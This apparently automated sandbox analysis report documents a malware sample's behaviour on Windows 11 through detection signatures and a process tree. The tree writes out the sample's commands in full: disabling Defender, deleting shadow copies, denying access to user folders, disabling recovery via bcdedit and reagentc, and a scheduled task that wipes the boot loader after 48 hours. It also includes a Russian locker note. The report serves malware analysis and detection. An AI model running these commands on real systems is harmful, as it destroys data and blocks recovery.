Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    09/08/2026, 18:52

General

  • Target
    2026-08-09_068b0862821a95f9d1a079cf7cb8ad59_cryptbot_icedid_luca-stealer_njrat_stealc.exe
  • Size 8.8MB
  • Sample260809-xjb7katfpg
  • SHA256 a68f41c4a160277f6cb36b99f0c528a9bb85bec4e3c2c7d12888f3c3ddbbbd08
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Family: salatstealer

    SalatStealer is a stealer that takes sceenshot written in Golang.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect SalatStealer payload 10 IoCs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 10 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers 10 IoCs
  • Detects command variations typically used by ransomware 1 IoCs
  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 10 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 13 IoCs
  • UPX dump on OEP (original entry point) 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Disables one or more Microsoft Defender components 1 TTPs 3 IoCs

    Uses the Powershell Set-MpPreference cmdlet to disable one or more Microsoft Defender components.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 9 IoCs
  • Stops running service(s) 4 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops file in System32 directory 2 IoCs
  • Executes a VBScript file via the Windows Script Host. 1 TTPs 8 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Executes a command shell one-liner 1 TTPs 3 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-08-09_068b0862821a95f9d1a079cf7cb8ad59_cryptbot_icedid_luca-stealer_njrat_stealc.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-08-09_068b0862821a95f9d1a079cf7cb8ad59_cryptbot_icedid_luca-stealer_njrat_stealc.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" invisible.vbs runbat start.bat
      2⤵
      • Executes a VBScript file via the Windows Script Host.
      • Suspicious use of WriteProcessMemory
      PID:5816
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "
        3⤵
        • Drops file in Program Files directory
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:3548
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
            PID:2940
          • C:\Windows\system32\net.exe
            net session
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4136
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              5⤵
                PID:1692
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
              4⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              PID:1888
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:1720
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:5420
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:4976
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2484
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Disables one or more Microsoft Defender components
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2780
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Disables one or more Microsoft Defender components
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Disables one or more Microsoft Defender components
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:824
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KapibaraEncryptor.ps1"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5932
            • C:\Windows\system32\timeout.exe
              timeout /t 3 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:5940
            • C:\Windows\system32\icacls.exe
              icacls "C:\Users\Admin\Desktop" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:3804
            • C:\Windows\system32\icacls.exe
              icacls "C:\Users\Admin\Documents" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:2080
            • C:\Windows\system32\icacls.exe
              icacls "C:\Users\Admin\Downloads" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:5468
            • C:\Windows\system32\icacls.exe
              icacls "C:\Users\Admin\Pictures" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:5724
            • C:\Windows\system32\icacls.exe
              icacls "C:\Users\Admin\Music" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:5320
            • C:\Windows\system32\icacls.exe
              icacls "C:\Users\Admin\Videos" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:4480
            • C:\Windows\system32\icacls.exe
              icacls "C:\Program Files" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:4760
            • C:\Windows\system32\icacls.exe
              icacls "C:\Program Files (x86)" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:688
            • C:\Windows\system32\icacls.exe
              icacls "C:\ProgramData" /deny Everyone:(OI)(CI)(RX)
              4⤵
              • Modifies file permissions
              PID:5144
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {current} bootstatuspolicy ignoreallfailures
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3128
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {current} recoveryenabled No
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3392
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {bootmgr} displaybootmenu No
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3204
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {bootmgr} timeout 0
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:5344
            • C:\Windows\system32\bcdedit.exe
              bcdedit /deletevalue {current} safeboot
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:5008
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {globalsettings} advancedoptions false
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3744
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {globalsettings} bootuxdisabled Yes
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:4900
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {globalsettings} optionsedit No
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3652
            • C:\Windows\system32\ReAgentc.exe
              reagentc /disable
              4⤵
              • Drops file in System32 directory
              • Drops file in Windows directory
              PID:4748
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableAdvancedStartup /t REG_DWORD /d 1 /f
              4⤵
                PID:4576
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c bcdedit /enum firmware | findstr /i "recoverysequence"
                4⤵
                • Executes a command shell one-liner
                • Suspicious use of WriteProcessMemory
                PID:3108
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /enum firmware
                  5⤵
                  • Modifies boot configuration data using bcdedit
                  PID:200
                • C:\Windows\system32\findstr.exe
                  findstr /i "recoverysequence"
                  5⤵
                    PID:2352
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "$part = Get-Partition | Where-Object { $_.Type -eq 'Recovery' }; if ($part) { Add-PartitionAccessPath -DiskNumber $part.DiskNumber -PartitionNumber $part.PartitionNumber -AccessPath 'R:' -ErrorAction SilentlyContinue; Remove-Item -Path 'R:\*' -Recurse -Force -ErrorAction SilentlyContinue; Remove-PartitionAccessPath -DiskNumber $part.DiskNumber -PartitionNumber $part.PartitionNumber -AccessPath 'R:' -ErrorAction SilentlyContinue }"
                  4⤵
                  • Hide Artifacts: Ignore Process Interrupts
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3080
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {globalsettings} bootmenupolicy Legacy
                  4⤵
                  • Modifies boot configuration data using bcdedit
                  PID:4592
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {fwbootmgr} displaybootmenu No
                  4⤵
                  • Modifies boot configuration data using bcdedit
                  PID:5740
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {fwbootmgr} timeout 0
                  4⤵
                  • Modifies boot configuration data using bcdedit
                  PID:3716
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableBootMenu /t REG_DWORD /d 1 /f
                  4⤵
                    PID:764
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableBootingFromExternalMedia /t REG_DWORD /d 1 /f
                    4⤵
                      PID:616
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableUEFI /t REG_DWORD /d 1 /f
                      4⤵
                        PID:4836
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin delete shadows /all /quiet
                        4⤵
                        • Interacts with shadow copies
                        PID:4100
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic shadowcopy delete
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1756
                      • C:\Windows\system32\sc.exe
                        sc config VSS start= disabled
                        4⤵
                        • Launches sc.exe
                        PID:3260
                      • C:\Windows\system32\sc.exe
                        sc stop VSS
                        4⤵
                        • Launches sc.exe
                        PID:1304
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                        4⤵
                          PID:700
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                          4⤵
                            PID:5720
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                            4⤵
                              PID:5644
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c bcdedit /enum firmware | findstr "identifier"
                              4⤵
                              • Executes a command shell one-liner
                              PID:2024
                              • C:\Windows\system32\bcdedit.exe
                                bcdedit /enum firmware
                                5⤵
                                • Modifies boot configuration data using bcdedit
                                PID:5316
                              • C:\Windows\system32\findstr.exe
                                findstr "identifier"
                                5⤵
                                  PID:5336
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo bootmgr "
                                4⤵
                                  PID:836
                                • C:\Windows\system32\findstr.exe
                                  findstr /i "fwbootmgr bootmgr"
                                  4⤵
                                    PID:4348
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\cdrom" /v Start /t REG_DWORD /d 4 /f
                                    4⤵
                                      PID:5360
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
                                      4⤵
                                        PID:3780
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
                                        4⤵
                                          PID:3976
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                          4⤵
                                            PID:1804
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                            4⤵
                                            • Disables RegEdit via registry modification
                                            PID:4156
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
                                            4⤵
                                              PID:4864
                                            • C:\Windows\system32\manage-bde.exe
                                              manage-bde -status C:
                                              4⤵
                                                PID:4780
                                              • C:\Windows\system32\findstr.exe
                                                findstr "Protection On"
                                                4⤵
                                                  PID:4380
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "Get-Date -Format 'yyyy-MM-dd HH:mm:ss' | Out-File -FilePath 'C:\kapibara_start.txt' -Encoding ASCII"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4172
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -Command "$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"$start = Get-Date (Get-Content C:\kapibara_start.txt); if (((Get-Date) - $start).TotalHours -ge 48) { takeown /f C:\Windows\Boot\EFI\bootmgfw.efi; icacls C:\Windows\Boot\EFI\bootmgfw.efi /grant *S-1-1-0:F; del C:\Windows\Boot\EFI\bootmgfw.efi -Force; bcdedit /createstore C:\empty.bcd; bcdedit /import C:\empty.bcd /clean; Remove-Item C:\kapibara_start.txt -Force; shutdown /r /t 5 }\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn; $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest; Register-ScheduledTask -TaskName 'KapibaraTimerCheck' -Action $action -Trigger $trigger -Principal $principal -Force"
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3512
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\application1.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\application1.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4400
                                                  • C:\Users\Admin\AppData\Local\Mozilla\SecurityHealthSystray.exe
                                                    C:\Users\Admin\AppData\Local\Mozilla\SecurityHealthSystray.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2376
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe
                                                      6⤵
                                                        PID:3404
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\SecurityHealthSystray.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\SecurityHealthSystray.exe" -
                                                        6⤵
                                                          PID:5052
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -NoProfile -ExecutionPolicy Bypass -Command "$code = '[DllImport(\"user32.dll\", CharSet=CharSet.Auto)] public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);'; Add-Type -MemberDefinition $code -Name 'Wallpaper' -Namespace 'WinAPI'; [WinAPI.Wallpaper]::SystemParametersInfo(20, 0, 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\wallpaper.png', 3)"
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Sets desktop wallpaper using registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1456
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yp5k0ib3\yp5k0ib3.cmdline"
                                                        5⤵
                                                          PID:5476
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3317.tmp" "c:\Users\Admin\AppData\Local\Temp\yp5k0ib3\CSCEA3D52B13D49418896E1C0135BFA896.TMP"
                                                            6⤵
                                                              PID:3524
                                                        • C:\Windows\system32\wscript.exe
                                                          wscript.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs" play1 "C:\Users\Admin\AppData\Local\Temp\RarSFX0\music1.mp3"
                                                          4⤵
                                                          • Enumerates connected drives
                                                          • Executes a VBScript file via the Windows Script Host.
                                                          • System policy modification
                                                          PID:2088
                                                        • C:\Windows\system32\mshta.exe
                                                          mshta "javascript:alert('Привет от зомбе тим!');close();"
                                                          4⤵
                                                            PID:2928
                                                          • C:\Windows\system32\wscript.exe
                                                            wscript.exe "C:\Users\Admin\AppData\Local\Temp\minify.vbs"
                                                            4⤵
                                                            • Executes a VBScript file via the Windows Script Host.
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:4476
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\application2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\application2.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4696
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Упс! Вы подверглись масштабной хакерской атаке ZOMBIE TEAM и теперь Ваш компьютер заблокирован, а все имеющиеся диски и файлы на них зашифрованы хакерской группировкой. Любые действия, связанные с попыткой обмануть систему, нанесут непоправимый вред Вашему компьютеру и приведут к потере всех важных файлов без возможности восстановления. При попытке снять блокировку MBR (главный загрузчик материнской платы) будет снесён и будет подана рекурсивная нагрузка на ваш процессор, что приведёт к его неисправности. У вас есть 48 часов с момента запуска чтобы ввести код, что бы получить код, напиши 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
                                                              5⤵
                                                              • Hide Artifacts: Hidden Files and Directories
                                                              PID:1696
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упс! Вы подверглись масштабной хакерской атаке ZOMBIE TEAM и теперь Ваш компьютер заблокирован, а все имеющиеся диски и файлы на них зашифрованы хакерской группировкой. Любые действия, связанные с попыткой обмануть систему, нанесут непоправимый вред Вашему компьютеру и приведут к потере всех важных файлов без возможности восстановления. При попытке снять блокировку MBR (главный загрузчик материнской платы) будет снесён и будет подана рекурсивная нагрузка на ваш процессор, что приведёт к его неисправности. У вас есть 48 часов с момента запуска чтобы ввести код, что бы получить код, напиши 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
                                                              5⤵
                                                              • Hide Artifacts: Hidden Files and Directories
                                                              PID:1268
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упс! Вы подверглись масштабной хакерской атаке ZOMBIE TEAM и теперь Ваш компьютер заблокирован, а все имеющиеся диски и файлы на них зашифрованы хакерской группировкой. Любые действия, связанные с попыткой обмануть систему, нанесут непоправимый вред Вашему компьютеру и приведут к потере всех важных файлов без возможности восстановления. При попытке снять блокировку MBR (главный загрузчик материнской платы) будет снесён и будет подана рекурсивная нагрузка на ваш процессор, что приведёт к его неисправности. У вас есть 48 часов с момента запуска чтобы ввести код, что бы получить код, напиши 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
                                                              5⤵
                                                              • Hide Artifacts: Hidden Files and Directories
                                                              PID:2352
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Упс! Вы подверглись масштабной хакерской атаке ZOMBIE TEAM и теперь Ваш компьютер заблокирован, а все имеющиеся диски и файлы на них зашифрованы хакерской группировкой. Любые действия, связанные с попыткой обмануть систему, нанесут непоправимый вред Вашему компьютеру и приведут к потере всех важных файлов без возможности восстановления. При попытке снять блокировку MBR (главный загрузчик материнской платы) будет снесён и будет подана рекурсивная нагрузка на ваш процессор, что приведёт к его неисправности. У вас есть 48 часов с момента запуска чтобы ввести код, что бы получить код, напиши 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
                                                              5⤵
                                                              • Hide Artifacts: Hidden Files and Directories
                                                              PID:1424
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Упс! Вы подверглись масштабной хакерской атаке ZOMBIE TEAM и теперь Ваш компьютер заблокирован, а все имеющиеся диски и файлы на них зашифрованы хакерской группировкой. Любые действия, связанные с попыткой обмануть систему, нанесут непоправимый вред Вашему компьютеру и приведут к потере всех важных файлов без возможности восстановления. При попытке снять блокировку MBR (главный загрузчик материнской платы) будет снесён и будет подана рекурсивная нагрузка на ваш процессор, что приведёт к его неисправности. У вас есть 48 часов с момента запуска чтобы ввести код, что бы получить код, напиши 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
                                                              5⤵
                                                              • Hide Artifacts: Hidden Files and Directories
                                                              PID:1548
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Упс! Вы подверглись масштабной хакерской атаке ZOMBIE TEAM и теперь Ваш компьютер заблокирован, а все имеющиеся диски и файлы на них зашифрованы хакерской группировкой. Любые действия, связанные с попыткой обмануть систему, нанесут непоправимый вред Вашему компьютеру и приведут к потере всех важных файлов без возможности восстановления. При попытке снять блокировку MBR (главный загрузчик материнской платы) будет снесён и будет подана рекурсивная нагрузка на ваш процессор, что приведёт к его неисправности. У вас есть 48 часов с момента запуска чтобы ввести код, что бы получить код, напиши 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
                                                              5⤵
                                                              • Hide Artifacts: Hidden Files and Directories
                                                              PID:3940
                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                              taskkill.exe /im Explorer.exe /f
                                                              5⤵
                                                              • Kills process with taskkill
                                                              PID:4832
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 2 /nobreak
                                                            4⤵
                                                            • Delays execution with timeout.exe
                                                            PID:4752
                                                          • C:\Windows\system32\wscript.exe
                                                            wscript.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs" play2 "C:\Users\Admin\AppData\Local\Temp\RarSFX0\music2.mp3"
                                                            4⤵
                                                            • Enumerates connected drives
                                                            • Executes a VBScript file via the Windows Script Host.
                                                            • System policy modification
                                                            PID:1812
                                                          • C:\Windows\system32\wscript.exe
                                                            wscript.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs" play2 "C:\Users\Admin\AppData\Local\Temp\RarSFX0\music3.mp3"
                                                            4⤵
                                                            • Enumerates connected drives
                                                            • Executes a VBScript file via the Windows Script Host.
                                                            • System policy modification
                                                            PID:3760
                                                          • C:\Windows\system32\wscript.exe
                                                            wscript.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs" play2 "C:\Users\Admin\AppData\Local\Temp\RarSFX0\music2.mp3"
                                                            4⤵
                                                            • Enumerates connected drives
                                                            • Executes a VBScript file via the Windows Script Host.
                                                            • System policy modification
                                                            PID:1484
                                                          • C:\Windows\system32\wscript.exe
                                                            wscript.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs" play2 "C:\Users\Admin\AppData\Local\Temp\RarSFX0\music3.mp3"
                                                            4⤵
                                                            • Enumerates connected drives
                                                            • Executes a VBScript file via the Windows Script Host.
                                                            • System policy modification
                                                            PID:4200
                                                          • C:\Windows\system32\wscript.exe
                                                            wscript.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs" play2 "C:\Users\Admin\AppData\Local\Temp\RarSFX0\music2.mp3"
                                                            4⤵
                                                            • Enumerates connected drives
                                                            • Executes a VBScript file via the Windows Script Host.
                                                            • System policy modification
                                                            PID:892
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s BDESVC
                                                      1⤵
                                                        PID:3224
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                          PID:984
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\elevation_service.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\elevation_service.exe"
                                                          1⤵
                                                            PID:3412

                                                          Network

                                                                MITRE ATT&CK Enterprise v16

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                CurrentDatabase_400.wmdb

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
                                                                • Size 384KB
                                                                • SHA256 65c3fd38f935b34f1dc69828d664f9188d540f51275c642605f2e23221f69420
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                CurrentDatabase_400.wmdb

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
                                                                • Size 1024KB
                                                                • SHA256 8d36572ff8e5034ee58722f0e004abc17558a10abf72eec2d9d630d2f4b04ac6
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                WMSDKNS.XML.bak

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
                                                                • Size 9KB
                                                                • SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                StartupProfileData-NonInteractive

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                • Size 1KB
